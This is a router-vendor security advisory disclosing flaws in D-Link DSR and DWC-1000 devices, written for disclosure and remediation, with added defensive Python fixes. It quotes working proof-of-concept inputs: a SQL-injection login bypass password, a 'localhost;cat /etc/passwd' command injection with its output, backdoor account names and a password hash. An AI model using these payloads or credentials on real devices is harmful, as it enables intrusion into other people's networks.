Security Announcement
DSR-150, DSR-250(N), DSR-500(N), DSR-1000(N) & DWC-1000 Authentication Bypass, Arbitrary Command Execution, persistent admin user, weak hash algorithms, credentials stored in plain text, UPnP stack vulnerabilities, and bad local file-system permissions.
Publication ID: SAP10012
Resolved Status: Yes
Published on: 27 February 2014 10:03 GMT
Last updated on: 2 July 2014 9:57 GMT

Overview

The D-Link DSR-150/150N/250/250N/500/500N/1000/1000N business service routers are under a security incident advisory for multiple vulnerabilities. Exploiting these vulnerabilities could result in data being compromised and in the system becoming unreliable and untrusted in a live production network.

D-Link Security Incident Response Policy

All public communication on this issue will be offered at http://securityadvisories.dlink.com/security/

Our security response team can be contacted for incident information or to report incidents at security@dlink.com

For any non-critical security issue, help with updating firmware, or configuration questions regarding this issue, please contact your D-Link customer care channel.

Reference

  • CVE-2013-5945: Authentication Bypass by SQL Injection
  • CVE-2013-5946: Privilege Escalation by Arbitrary Command Execution
  • CVE-2012-5958, CVE-2012-5959, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965: UPnP Vulnerabilities
  • Persistent admin credentials resulting in backdoor access
  • Use of weak hash algorithms
  • Passwords stored as plain text in config files
  • Bad permissions on /etc/shadow

General Disclosure

Security and performance are of the utmost importance to D-Link across all product lines, not only during the development process but also through regular firmware updates that comply with current safety and quality standards. We are proactively working with the sources of these reports and continuing to review the complete product line to ensure that the vulnerabilities discovered are addressed. We will continue to update this page with the relevant product firmware updates addressing these concerns. In the meantime, you can follow the precautions below to avoid unwanted intrusion into your D-Link product.

Immediate Recommendations for all D-Link device customers

  • If you receive unsolicited e-mails that relate to security vulnerabilities and prompt you to take action, please ignore them. Clicking on links in such e-mails could allow unauthorised persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages asking you to click or install something.
  • Make sure that your wireless network is secure.
  • Do not provide your admin password to anyone. If required, we suggest updating the password frequently.

Details

The D-Link DSR-150/150N/250/250N/500/500N/1000/1000N are susceptible to multiple vulnerabilities that may allow a malicious attacker to access the device, modify its configuration, and change features to enable further exploits. Exploiting these vulnerabilities could result in data being compromised and in the system becoming unreliable and untrusted in a live production network.

The following information is extracted directly from the author of the reported vulnerability:

Authentication Bypass by SQL-Injection (CVE-2013-5945)

Proof of Concept:

* Possible via the global webUI login form.

* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

  function login.authenticate(tablename, tableInput)
    local username = tableInput["Users.UserName"]
    local password = tableInput["Users.Password"]
    local cur = db.execute(string.format([[
                  SELECT *, ROWID AS _ROWID_ FROM %s
          WHERE %s = '%s' AND %s = '%s'
      ]], tablename, "UserName", username, "Password", password))
    local result = false
    local statusCode = "NONE"
    if cur then
      local row = cur:fetch({}, "a")
      cur:close()
      result = row ~= nil
      if result == false then
        statusCode = "USER_LOGIN_INVALID_PASSWORD"
      end
    end
    return result, statusCode
  end

* This function creates an SQL statement of the form:

  SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

* Since there is a default admin user account called "admin" around, this is 
  easily exploitable by providing this to the login form:

  username = admin
  password = ' or 'a'='a

* ...resulting in this SQL statement:

  SELECT * 
    FROM "Users" 
    WHERE "UserName" = 'admin' 
      AND "Password" = '' or 'a'='a';

* Old school SQL injection. Ohh, by the way...

* The same fault can be found in captivePortal.lua 
  -- FREE NETWORKS FOR EVERYONE --

All proper permissions and ownerships have been audited, and the vulnerable users/credentials have been removed from the system.

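To make the defect concrete, here is an added example (not the firmware's code) that reproduces the login.lua query against an in-memory SQLite table and places the parameterised version beside it; the table, user name and password are constructed sample values.

```python
import sqlite3

# Constructed stand-in for the router's Users table. The user name and
# password are sample values, not the device's real credentials, and the
# password is kept in plain text only to mirror the finding on this page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def authenticate_vulnerable(conn, username, password):
    # Mirrors login.lua: the form values are pasted into the SQL text, so a
    # quote character in the password rewrites the WHERE clause itself.
    sql = "SELECT * FROM Users WHERE UserName = '%s' AND Password = '%s'" % (
        username, password)
    return conn.execute(sql).fetchone() is not None

def authenticate_fixed(conn, username, password):
    # Bound parameters: the driver hands the values to SQLite separately from
    # the statement, so the same input is compared literally with the column.
    sql = "SELECT * FROM Users WHERE UserName = ? AND Password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

BYPASS = "' or 'a'='a"   # the password value quoted in the advisory

if __name__ == "__main__":
    conn = make_db()
    print(authenticate_vulnerable(conn, "admin", BYPASS))  # True: bypass
    print(authenticate_fixed(conn, "admin", BYPASS))       # False: literal
```

Storing a proper password hash and comparing it in application code is the further step this page's "Use of Weak Hash Algorithms" section points to; the example stops at the injection fix.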
Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

* Possible from the Tools --> System Check page.

* File /pfrm2.0/var/www/systemCheck.htm contains:

  local function runShellCmd(command)
      local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
      local cmdOutput = pipe:read("*a")
      pipe:close()
      return cmdOutput
  end
  if (ButtonType and ButtonType == "ping") then
    [...]
    local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
    globalCmdOutput = runShellCmd(cmd_ping)
    statusMessage = "Pinging " .. ipToPing
    [...]
  elseif (ButtonType and ButtonType == "traceroute") then
    [...]
    local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
    globalCmdOutput = runShellCmd(cmd)
    statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
    [...]
  elseif (ButtonType and ButtonType == "dnslookup") then
    [...]
    util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
    statusMessage = "DNS Lookup for " .. internetNameToNsLookup
    [...]

* Command injection is possible in at least these form sections:
  
  Ping or Trace an IP Address
  Perform a DNS Lookup
  
* When using a browser, deactivate the "onclick" JavaScript checks using 
  a tool like Firebug. Tools like curl are not hindered by these checks.
  
* All forms allow input like this:
  
  localhost;<command>
  
  example: 
  
  localhost;cat /etc/passwd
  
* This user provided value is then directly used as part of the input for the
  call to runShellCmd(c) and thus io.popen(c) in the first form section and 
  os.execute(c) in the second form section.
  
* Output from user provided commands gets displayed on the next page beneath 
  the benign command output.
  
  example: 
  
  [...]
  <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms
    root:!:0:0:root:/root:/bin/sh
    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
    nobody:x:0:0:nobody:/nonexistent:/bin/false
    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
  </textarea>
  [...]

All proper permissions and ownerships have been audited, and the vulnerable users/credentials have been removed from the system.

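The root cause above is that the host field reaches io.popen and os.execute as part of a shell command line. An added example (not the firmware's code) of the two defensive changes a fix needs: validate the field as an IP literal or host name, and run the tool with an argument list instead of a shell. The Linux/BusyBox ping flags are an assumption.

```python
import ipaddress
import re
import subprocess

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens.
# A label must start with a letter or digit, so a value starting with '-'
# can never be read by ping as an option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"^(?:%s\.)*%s\.?$" % (_LABEL, _LABEL))

def is_valid_target(value):
    """Accept only an IP literal or a plain host name for the ping, traceroute
    and DNS-lookup forms; ';', spaces and other shell syntax never match."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(value) is not None

def build_ping_argv(target, count=4):
    """argv list for subprocess: with no shell involved, the target is one
    argument to ping and nothing else, even if validation were bypassed."""
    if not is_valid_target(target):
        raise ValueError("rejected host value: %r" % target)
    return ["ping", "-c", str(count), target]  # assumes Linux/BusyBox ping

def run_ping(target):
    """Replacement for runShellCmd(cmd_ping) in systemCheck.htm: no shell,
    stderr merged into the result like the original's '2>&1'."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=30)
    return proc.stdout + proc.stderr

if __name__ == "__main__":
    for candidate in ("192.0.2.1", "router.example", "localhost;cat /etc/passwd"):
        print("%-30s valid=%s" % (candidate, is_valid_target(candidate)))
```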
UPnP Vulnerabilities (CVE-2012-5958, CVE-2012-5959, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965)

This family of devices uses the Intel libupnp library. Maintenance of that stack ended years ago, so several patches had to be made directly to the stack to close the vulnerabilities referenced in these CVEs.

Under the guidance of resources involved in designing the Intel libupnp library, we have patched Intel SDK libupnp v1.3.1 to: 1) use 'snprintf' and 'strncpy' instead of 'sprintf' and 'strcpy'; 2) when doing a 'strncpy', check whether more bytes would be copied than the destination buffer can hold.

Persistent Admin User

* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

  root:!:0:0:root:/root:/bin/sh
  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
  nobody:x:0:0:nobody:/nonexistent:/bin/false
  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". 
  That was the account I hacked before with my previous exploit: 
  http://www.exploit-db.com/papers/22930/
  And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. 
  Instead of removing the backdoor, D-Link just created a new one. 
  
* I verified this by showing the /etc/profile:
  
  # /etc/profile
  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
  PATH=.:/pfrm2.0/bin:$PATH
  CLISH_PATH=/etc/clish
  export PATH LD_LIBRARY_PATH CLISH_PATH
  # redirect all users except root to CLI
  if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
  trap "/bin/login" SIGINT
  trap "" SIGTSTP
  /pfrm2.0/bin/cli
  exit
  fi
  PS1='DSR-250N> '

All proper permissions and ownerships have been audited, and the vulnerable users/credentials have been removed from the system.

Use of Weak Hash Algorithms

* In the /etc/shadow, salted DES hashes are used to store user passwords.
  Since this hash type supports at most 8 characters, users can log in by just 
  typing the first 8 letters of their passwords when using SSH or telnet.
  
* An effective password length limitation of 8 characters makes brute force 
  attacks on user accounts very feasible, even if the user chose a longer 
  password.

Improvements to these algorithms have been made to correct the issue and increase the safety of user data.

Passwords Stored in Plain-Text

* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the 
  /tmp/system.db is built on boot time, reveals that all user passwords are 
  stored in plain text.

  Example:

  [...]  
  Users = {}
  Users[1] = {}
  Users[1]["Capabilities"] = ""
  Users[1]["DefaultUser"] = "1"
  Users[1]["UserId"] = "1"
  Users[1]["FirstName"] = "backdoor"
  Users[1]["OID"] = "0"
  Users[1]["GroupId"] = "1"
  Users[1]["UserName"] = "gkJ9232xXyruTRmY"
  Users[1]["Password"] = "thisobviouslyisafakepass"
  Users[1]["UserTimeOut"] = "10"
  Users[1]["_ROWID_"] = "1"
  Users[1]["LastName"] = "ssl"
  [...]

We have implemented proper storage and restricted handling of configurations stored on the device.

Incorrect Permissions on /etc/shadow

* This file should have 600 permissions set and not 644. It is world readable.
  Pointless, since every process runs as root, no user separation is 
  done anyway.

  DSR-250N> ls -l -a /etc/shadow
  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow
  DSR-250N> ps
    PID USER       VSZ STAT COMMAND
      1 root      2700 S    init
      2 root         0 SW<  [kthreadd]
      3 root         0 SW<  [ksoftirqd/0]
      4 root         0 SW<  [events/0]
      5 root         0 SW<  [khelper]
      8 root         0 SW<  [async/mgr]
    111 root         0 SW<  [kblockd/0]
    120 root         0 SW<  [khubd]
    123 root         0 SW<  [kseriod]
    128 root         0 SW<  [kslowd]
    129 root         0 SW<  [kslowd]
    150 root         0 SW   [pdflush]
    151 root         0 SW   [pdflush]
    152 root         0 SW<  [kswapd0]
    200 root         0 SW<  [aio/0]
    210 root         0 SW<  [nfsiod]
    220 root         0 SW<  [crypto/0]
    230 root         0 SW<  [cns3xxx_spi.0]
    781 root         0 SW<  [mtdblockd]
    860 root         0 SW<  [usbhid_resumer]
    874 root         0 SW<  [rpciod/0]
    903 root         0 SWN  [jffs2_gcd_mtd4]
    909 root         0 SWN  [jffs2_gcd_mtd5]
    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
    999 root      1816 S <  /pfrm2.0/udev/sbin/udevd --daemon
   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db
   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db
   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login
   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd
   1141 root     37000 S    /pfrm2.0/bin/sshd
   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db
   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db
   1560 root         0 SW<  [key_timehandler]
   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
   1600 root      8036 S    rvgd /tmp/system.db
   1612 root         0 SW   [cavium]
   1621 root      8424 S    vpnKAd /tmp/system.db
   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d
   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d
   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd
   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
   1771 root      2680 S    /pfrm2.0/bin/statusD
   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db
   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db
   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db
   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db
   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db
   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db
   2205 root      1904 S    /pfrm2.0/bin/fReset
   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh
   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100
   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
   3355 root      1768 S    /pfrm2.0/bin/rt2860apd
   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
   5353 root      2704 S    -sh
   7877 root      2568 S    sleep 60
   7953 root      2568 S    sleep 60
   8008 root      2704 R    ps
  16749 root      2704 S    -sh
  25690 root         0 SW<  [RtmpCmdQTask]
  25692 root         0 SW<  [RtmpWscTask]
  DSR-250N> 

All proper permissions and ownerships have been audited, and the vulnerable users/credentials have been removed from the system.

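A small audit that a reviewer of a firmware root file system could run, added here as an example (not D-Link's or the reporter's code). It covers the Persistent Admin User, Use of Weak Hash Algorithms and Incorrect Permissions on /etc/shadow sections together: extra UID-0 accounts and a hash left in /etc/passwd (taken from the listing above), traditional DES-crypt hashes with their 8-character limit, and a shadow file readable by group or others. The /etc/shadow sample is constructed with fake hashes.

```python
import re
import stat

# /etc/passwd sample, copied from the listing in this advisory.
PASSWD = """\
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
"""
# Constructed /etc/shadow sample with fake hashes: one traditional DES-crypt
# entry (13 characters, no '$' prefix) and one SHA-512 crypt entry for contrast.
SHADOW = """\
admin:abJnggxhB/yWI:16000:0:99999:7:::
guest:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASH:16000:0:99999:7:::
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")

def audit_passwd(text):
    """Flag every UID-0 account besides root, and any hash kept in passwd
    instead of shadow (the backdoor account above has both problems)."""
    findings = []
    for line in text.splitlines():
        name, pw, uid = line.split(":")[:3]
        if uid == "0" and name != "root":
            findings.append(("uid0", name))
        if pw not in ("x", "!", "*", ""):
            findings.append(("hash_in_passwd", name))
    return findings

def audit_shadow(text):
    """Flag hashes whose algorithm truncates at 8 characters (DES) or is MD5."""
    findings = []
    for line in text.splitlines():
        name, pw = line.split(":")[:2]
        if DES_CRYPT.match(pw):
            findings.append(("des_crypt", name))
        elif pw.startswith("$1$"):
            findings.append(("md5_crypt", name))
    return findings

def shadow_mode_ok(mode):
    """/etc/shadow must not be group- or world-readable (0600 expected)."""
    return not (mode & (stat.S_IRWXG | stat.S_IRWXO))

if __name__ == "__main__":
    print(audit_passwd(PASSWD))
    print(audit_shadow(SHADOW))
    print(shadow_mode_ok(0o644), shadow_mode_ok(0o600))  # False True
```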
Affected Products

Model Name   HW Version   Current FW Version   New FW Version for this exploit fix
DSR-150      A1           V1.07 and lower
DSR-150      A2           V1.07 and lower
DSR-150N     A2           V1.04 and lower
DSR-250      A1           V1.07 and lower
DSR-250      A2           V1.07 and lower
DSR-250N     A1           V1.07 and lower
DSR-250N     A2           V1.07 and lower
DSR-500      Ax           V1.07 and lower
DSR-500N     Ax           V1.07 and lower
DSR-1000     Ax           V1.07 and lower
DSR-1000N    Ax           V1.07 and lower
DWC-1000     Ax           v4.2.0.3 and lower

Security patches for your D-Link Product

These firmware updates address the security vulnerabilities in the affected D-Link products. D-Link will update this page continually, and we strongly recommend that all users install the relevant updates.

As there are different hardware revisions of our products, please check the hardware revision of your device before downloading the corresponding firmware update. The hardware revision is usually printed on the product label on the underside of the product, next to the serial number. Alternatively, it can also be found in the device's web configuration.